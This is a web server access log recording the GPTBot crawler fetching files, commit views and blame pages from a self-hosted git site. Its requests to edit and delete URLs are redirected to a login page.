"/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13918] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10166] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fTestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 21835] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:16:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 21135] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:16:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 21327] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:16:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 20598] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:16:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 11055] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 15936] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:16:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:16:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11418] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11419] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:16:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:16:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:16:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:16:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:16:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:16:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:16:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:16:29:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:29:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:29:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:16:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/status.json" +[17/Feb/2026:16:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:29:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12240] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8423] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:16:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" +[17/Feb/2026:16:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html" [Client 74.7.227.38] [Length 19228] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr 